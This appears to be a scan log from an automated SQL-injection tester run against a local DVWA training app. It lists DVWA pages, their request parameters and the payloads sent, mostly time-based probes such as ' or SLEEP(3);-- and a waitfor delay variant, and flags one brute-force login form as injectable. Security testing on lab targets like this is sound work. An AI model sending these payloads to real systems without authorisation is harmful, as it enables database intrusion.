Target: http://localhost/dvwa/ (GET)

---
URL:http://localhost/dvwa/vulnerabilities/brute/ (GET)
VulnName: sqli
Query: {'username': 'cntvalue', 'Login': 'Login', 'password': 'cntvalue'}
Payload: d'z"0
Advice: use orm
---
---
URL:http://localhost/dvwa/instructions.php (GET)
VulnName: 
Query: {'doc': 'changelog'}
Payload: ' or SLEEP(3);-- 
Advice: 
---
---
URL:http://localhost/dvwa/vulnerabilities/csrf/ (GET)
VulnName: 
Query: {'password_new': 'cntvalue', 'password_conf': 'cntvalue', 'Change': 'Change'}
Payload:  or SLEEP(3);-- 
Advice: 
---
---
URL:http://localhost/dvwa/instructions.php (GET)
VulnName: 
Query: {'doc': 'readme'}
Payload: ' or SLEEP(3);-- 
Advice: 
---
---
URL:http://localhost/dvwa/vulnerabilities/fi/ (GET)
VulnName: 
Query: {'page': 'file1.php'}
Payload: ';waitfor delay '0:0:3';-- 
Advice: 
---
---
URL:http://localhost/dvwa/vulnerabilities/fi/ (GET)
VulnName: 
Query: {'page': 'file3.php'}
Payload: " or SLEEP(3);-- 
Advice: 
---
---
URL:http://localhost/dvwa/vulnerabilities/fi/ (GET)
VulnName: 
Query: {'page': 'file2.php'}
Payload: ' or SLEEP(3);-- 
Advice: 
---
---
URL:http://localhost/dvwa/vulnerabilities/xss_r/ (GET)
VulnName: 
Query: {'name': 'cntvalue'}
Payload: ` or SLEEP(3);-- 
Advice: 
---
---
URL:http://localhost/dvwa/instructions.php (GET)
VulnName: 
Query: {'doc': 'copying'}
Payload: ` or SLEEP(3);-- 
Advice: 
---
---
URL:http://localhost/dvwa/vulnerabilities/sqli_blind/ (GET)
VulnName: 
Query: {'id': 'cntvalue', 'Submit': 'Submit'}
Payload: ' or SLEEP(3);-- 
Advice: 
---
---
URL:http://localhost/dvwa/vulnerabilities/captcha/ (POST)
VulnName: 
Query: {'password_conf': 'cntvalue', 'recaptcha_response_field': 'manual_challenge', 'password_new': 'cntvalue', 'recaptcha_challenge_field': '', 'step': '1', 'Change': 'Change'}
Payload: ' or SLEEP(3);-- 
Advice: 
---